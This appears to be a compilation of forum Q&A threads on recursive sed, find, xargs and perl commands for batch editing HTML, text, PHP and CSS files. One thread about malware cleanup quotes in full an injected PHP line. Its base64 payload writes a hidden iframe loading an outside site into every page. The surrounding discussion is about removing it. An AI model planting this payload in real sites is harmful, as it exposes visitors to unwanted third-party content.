Recursive multiline sed - remove beginning of file until pattern match - regex

I have nested subdirectories containing html files. For each of these html files I want to delete from the top of the file until the pattern <div id="left-
This is my attempt from osx's terminal:
find . -name "*.html" -exec sed "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
I get a lot of HTML output in the terminal, but no files contain the substitution or are written.

There are two problems with your command. The first problem is that you aren't selecting an output location for sed. The second is that your sed script is not doing what you want it to do: the script you posted will look at each line and delete everything ON THAT LINE before the <div>. Lines without the <div> will be unaffected. You may want to try:
find . -name "*.html" -exec sed -i.BAK -n "/<div id=\"left-col/,$ p" {} \;
This will also automatically back up your files by appending .BAK to the original names. If this is undesirable, change -i.BAK to -i '' on OS X (BSD sed); GNU sed accepts a bare -i.
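To see what the address range does before touching real files, here is a minimal sketch on a throwaway file. The file name page.html and its contents are made up for illustration; the sed script is the same range expression as in the command above, run without -i so nothing is edited in place.

```shell
# Hypothetical sample file, created in a temporary directory.
tmp=$(mktemp -d)
printf '%s\n' '<html>' '<body>' '<div id="left-col">' '<p>kept</p>' '</body>' > "$tmp/page.html"

# -n suppresses default output; the range runs from the first matching
# line through the last line ($), and p prints only those lines.
result=$(sed -n '/<div id="left-col/,$p' "$tmp/page.html")
echo "$result"
```

Everything above the matching line is dropped; the matching line itself and all lines after it are kept.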

You're outputting the result of the sed regex to stdout, the console, when you want to be writing it to the file.
To edit the files in place with sed, use the -i flag. On OS X, BSD sed requires a backup suffix after -i; pass '' for none:
find . -name "*.html" -exec sed -i '' "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
Make sure you back up your files before running this command, if possible. Otherwise you risk data loss from a mistyped regex.

You're not storing the output of sed anywhere; that's why it's spitting out the html.

Related

Using SED to replace a domain name in a large number of HTML files

Ok, I give up. I've been trying for a couple of hours to get sed to replace an incorrectly formatted domain name in several thousand html files but I cannot seem to get the escaping of the slashes (and possibly dot/colon) correct.
Text to find:
http://www.domain.com/http
Replace with:
http
What I have tried:
sed -i 's/http:\/\/www.domain.com\/http/http/'
sed -i 's/http\\:\\/\\/www\\.domain\\.com\\/http/http/'
sed -i 's/http\:\/\/www\.domain\.com\/http/http/'
sed -i 's=http://www.domain.com/http=http='
UPDATE:
As it transpires, I was chasing ghosts. A piece of JavaScript was adding the http://www.domain.com/ to the beginning of all my img tags! Unfortunately, I now need to remove this from all pages. So instead of the above, I am now looking to:
Replace this:
http://www.domain.com/'+img[0]
with this:
'+img[0]
I have tried the following to no avail:
find . -name "*.html" -type f -exec sed -i 's|http://www\.domain\.com/\'+img\[0\]|\'+img\[0\]|g' {} \;
find . -name "*.html" -type f -exec sed -i 's|http://www\.domain\.com/\'+img[0]|\'+img[0]|g' {} \;
I appear to be stuck on the escaping of certain chars again. Only this time, when I try to run one of the above commands, it just takes me to a > prompt.
You can avoid a lot of the escaping by using a different delimiter. The dot . is the only character with special meaning that needs to be escaped; everything else you can match literally. Also use the global modifier with your pattern.
sed -i 's|http://www\.domain\.com/http|http|g'
Edit: You can use the following to replace the other part.
sed -i "s|http://www\.domain\.com/\('[+]img\[0\]\)|\1|g"
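The > prompt in the question comes from the shell, not from sed: inside single quotes a backslash does not escape a single quote, so \' ends the string and leaves the quoting unbalanced. A small sketch of the double-quoted form, run against a made-up sample line through a pipe so that no file is modified (the variable names and the sample text are assumptions for illustration):

```shell
# Sample line modelled on the question; not taken from a real file.
input="x = 'http://www.domain.com/'+img[0];"

# Double quotes around the script let the single quote appear literally.
# [+] and \[0\] match a literal + and a literal [0].
output=$(printf '%s\n' "$input" | sed "s|http://www\.domain\.com/\('[+]img\[0\]\)|\1|g")
echo "$output"
```

Only the domain prefix is removed; the captured '+img[0] part is put back by \1.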

Pass sed output to mv

I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)
Where I wrote $sed would be the output of sed.
Hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
    # Extract the <title> text, then turn each run of spaces or tabs into one underscore.
    new=$(sed -n 's/<title>\([^<]*\)<\/title>/\1/p' "$file" | sed -e 's/[[:blank:]][[:blank:]]*/_/g')
    mv "$file" "$new.txt"
done
So, if you have files 1.txt, 2.txt and 3.txt, with cat, dog and my hippo respectively in their <title> tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted $file in case there are spaces in filenames, and added a second sed to convert any whitespace in the <title> text to underscores in the resulting filenames. NOTE: the [[:blank:]] class in the second sed command matches a space or a tab character.
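A self-contained way to try the rename loop without risking real files is to run it in a temporary directory. This is only a sketch: the sample file and its contents are invented, and the check for an empty title is an addition that the loop above does not have.

```shell
# Hypothetical sample file in a scratch directory.
tmp=$(mktemp -d)
printf '%s\n' '<html><head>' '<title>my hippo</title>' '</head></html>' > "$tmp/3.txt"

for file in "$tmp"/*.txt; do
    # Take the first <title> text and replace runs of spaces/tabs with "_".
    title=$(sed -n 's/.*<title>\([^<]*\)<\/title>.*/\1/p' "$file" | head -n 1 | sed 's/[[:blank:]][[:blank:]]*/_/g')
    # Skip files with no usable title rather than renaming them to ".txt".
    if [ -n "$title" ]; then
        mv "$file" "$tmp/$title.txt"
    fi
done
listing=$(ls "$tmp")
echo "$listing"
```

Two files with the same title would still overwrite each other, so mv -n or mv -i may be worth considering on real data.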
You can enclose an expression in backticks (`) to have the shell substitute its output at that position. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
It is not very flexible, but should work.
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
    sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" "$i"
done
The sed substitution searches for the pattern in each of your .txt files. For each file it builds the string mv 'file_name' 'found_pattern'.
With the e flag at the end of the s command, the resulting string is executed directly as a shell command, which renames your files. Note that e is a GNU sed extension.
Some hints:
Note the use of = instead of / as the delimiter for the sed substitution: it is more readable since your pattern already contains a /, and you don't have to escape it (you could use many other symbols if you don't like =).
The e flag makes sed execute the created string.
(I'm speaking of this one:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
                                          ^
)
So use it with caution! I would recommend first running the line without the final e: it won't execute any mv command, but will just print what would be executed if you added the e.
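A dry run along those lines could look like the sketch below. It replaces the e flag with p and adds -n, so only the generated mv command is printed and nothing is executed. The sample file 1.txt and its contents are made up for illustration.

```shell
# Hypothetical sample file in a scratch directory.
tmp=$(mktemp -d)
printf '%s\n' '<title>cat</title>' > "$tmp/1.txt"
i="$tmp/1.txt"

# Same substitution as above, but printed (p) instead of executed (e).
preview=$(sed -n "s=<title>\(.*\)</title>=mv '$i' '\1'=p" "$i")
echo "$preview"
```

Once the printed commands look right, switching p back to e (GNU sed only) would run them.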
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find:
ls *.txt | xargs -i\{\} command "{}" ...
find . -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always write the xargs placeholder as -i\{\} so that the same command works unchanged with find and its {} placeholder.
The -maxdepth option keeps find from descending into subdirectories; if there are none, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is how to get the text from the title element.
A simple solution (suitable if the opening and closing tags are on the same line) is to use grep.
A more robust solution is to use an HTML parser and navigate the DOM.
The simple solution is based on:
get the title line
remove everything before and after the title content
Putting it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.
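One thing to be aware of with the commands above is that {} is pasted directly into the bash -c script, so a filename containing quotes or $ could be interpreted as code. A possible variation, sketched here under the assumption that each title sits on a single line, passes the filename as a positional argument instead. The sample file is invented for the demonstration.

```shell
# Hypothetical sample file in a scratch directory.
tmp=$(mktemp -d)
printf '%s\n' '<head><title>dog</title></head>' > "$tmp/2.txt"

# The filename arrives as $1 inside the script; "_" fills $0.
find "$tmp" -maxdepth 1 -type f -name '*.txt' -exec bash -c '
    f=$1
    title=$(sed -n "s#.*<title>\([^<]*\)</title>.*#\1#p" "$f" | head -n 1)
    new="$(dirname "$f")/$title.txt"
    # Only rename when a title was found and the name would actually change.
    if [ -n "$title" ] && [ "$f" != "$new" ]; then
        mv "$f" "$new"
    fi
' _ {} \;
renamed=$(ls "$tmp")
echo "$renamed"
```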

How to delete lines while preserving certain characters via sed/perl?

I'm trying to do a mass search and replace on all .php files for the following string for malware cleanup:
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vd3d3Lml3cy1sZWlwemlnLmRlL2NvbnRhY3RzLnBocCI+PC9pZnJhbWU+PC9kaXY+Jyk7PC9zY3JpcHQ+');}
I can delete the entire line via sed '/buffer.base64_decode/d' file.php. However, I still need the opening <?php
So what really needs to be done is a search and replace of buffer.base64_decode for <?php and my brain is all mashed potatoes after a long day in front of this evil computer.
Or maybe I've thought myself into a tiny box and am going about this all wrong?
Instead of deleting the line, why don't you simply change it? Here's how, using GNU sed:
sed -i '/buffer.base64_decode/c \<?php ' file.php
Now for all files in your working directory:
find . -type f -name "*.php" -exec sed -i '/buffer.base64_decode/c \<?php ' {} \;
perl -pe 's/<\?php ob_start\("security_update"\);.*?\?>//gsm; s/<\?php ob_start\("security_update"\);.*/<?php/g;' test.php
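Where the one-line form of the c command is not available (as far as I know, BSD sed expects the replacement text on a following line), a substitution restricted to the matching line should give a similar result. The sketch below uses a shortened stand-in for the injected line; the payload 'QUJD' and the second line are placeholders, not the real malware.

```shell
tmp=$(mktemp -d)
# Shortened, hypothetical version of the injected line plus one normal line.
printf '%s\n' "<?php ob_start(\"security_update\"); function security_update(\$buffer){return \$buffer.base64_decode('QUJD');}" 'echo "hello";' > "$tmp/file.php"

# On lines containing the marker, replace the whole line with "<?php".
cleaned=$(sed '/buffer\.base64_decode/s/.*/<?php/' "$tmp/file.php")
echo "$cleaned"
```

This prints the result instead of editing the file, which makes it easy to diff against the original before adding -i.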

batch process regular expression find and replace on folder and subfolders contents

I have a folder with subfolders that contain text documents (hundreds). The text documents all require a find and replace. The regular expression I am using to find the text is:
^([A-Z])[\r\n]+(\w+)\b
This is being replaced by:
$1$2
How can I batch process this find and replace on a folder with subfolders?
I'm using a mac (osx 10.6.8)
You could use sed for this as well:
cd /path/to/files # make sure you are in the right directory
find . -type f -exec sed -i.bak 's/^([A-Z])[\r\n]+(\w+)\b/$1$2/g' {} \;
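Edit: I just realized that the above is a TextMate search/replace string. sed writes backreferences as \1 and \2, and needs -E for unescaped ( ) and +:
find . -type f -exec sed -E -i.bak 's/^([A-Z])[\r\n]+(\w+)\b/\1\2/g' {} \;
This makes a backup of each file. Note that sed reads its input one line at a time, so the [\r\n]+ part cannot match across a line break as written.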
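You could do this using find and perl. Because the pattern spans a line break, perl has to read each file whole (-0777) and treat ^ as the start of any line (the m flag):
find . -type f -exec perl -0777 -p -i -e 's/^([A-Z])[\r\n]+(\w+)\b/$1$2/gm' {} \;
Warning: untested :)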

sed mass replace CSS styles via terminal

I want to replace all instances of font-family: ([A-Za-z ,"]+){1}; with font-family: Verdana using sed. In the past, the following command has worked for simple search & replace:
find ./ -type f -exec sed -i 's/needle/replace/' {} \;
However, I tried the following regex with no success:
find ./ -type f -exec sed -i 's/(font\-family:){1}([\"A-Za-z, ]+){1}(;){1}/font\-family: Verdana;/' {} \;
I'm on Red Hat Enterprise Linux Server release 5.6. Additionally, the first command seems to only work on the first instance in any given file, which means I have to rerun the command until every instance gets replaced... can I improve the command to work on all instances of all files?
First, an explanation of why yours doesn't work. sed uses basic regular expressions by default, so you need to escape all of your parentheses, curly braces, and the +. The following should work:
sed -i 's/\(font\-family:\)\{1\}\(["A-Za-z, ]\+\)\{1\}\(;\)\{1\}/font-family: Verdana;/'
Fortunately you can add the -r switch to prevent the need for all of that escaping, but you can also simplify your current expression quite a bit. You do not need to put every section into a capturing group, and adding {1} to every group is redundant (that is basically the default). So you could reduce it to:
sed -ri 's/font-family:["A-Za-z, ]+;/font-family: Verdana;/g'
Note the added g option for global replacement, since you want this for every occurrence.
All together:
find ./ -type f -exec sed -ri 's/font-family:["A-Za-z, ]+;/font-family: Verdana;/g' {} \;
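The simplified expression can be tried on a single line of CSS before running it over a whole tree. This sketch uses -E, which both GNU and BSD sed accept for extended regular expressions, and a made-up sample string. Note that the character class does not include a hyphen, so a value such as sans-serif would not be matched unless - is added to the brackets.

```shell
# Invented sample with two declarations on one line.
css='body { font-family: "Times New Roman", serif; } p { font-family: Arial, Helvetica; }'

# g replaces every occurrence on the line, not just the first.
out=$(printf '%s\n' "$css" | sed -E 's/font-family:["A-Za-z, ]+;/font-family: Verdana;/g')
echo "$out"
```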
the problem is, you need -r in your sed, since you used +
see the test below:
kent$ echo "oldstring_0000"|sed 's/[0]+/newstring/'
oldstring_0000
nothing happened.
now with -r:
kent$ echo "oldstring_0000"|sed -r 's/[0]+/newstring/'
oldstring_newstring
also if you want to replace all, you need 'g' like 's/a/b/g'
I'm not sure I fully understand your font-family expression: font-family: ([A-Za-z ,"]+){1}; Are those matching parens, and are you looking for exactly one match with {1}?
Your regex is just complicated enough that I'd switch from sed to perl -pi:
find ./ -type f -exec perl -pi -e 's/font-family:[\"A-Za-z, ]+;/font-family: Verdana;/g' {} \;
Try something like this:
sed -i 's/\(font-family:\) \(.*[^;]\)\(;.*\)/\1 Verdana\3/g'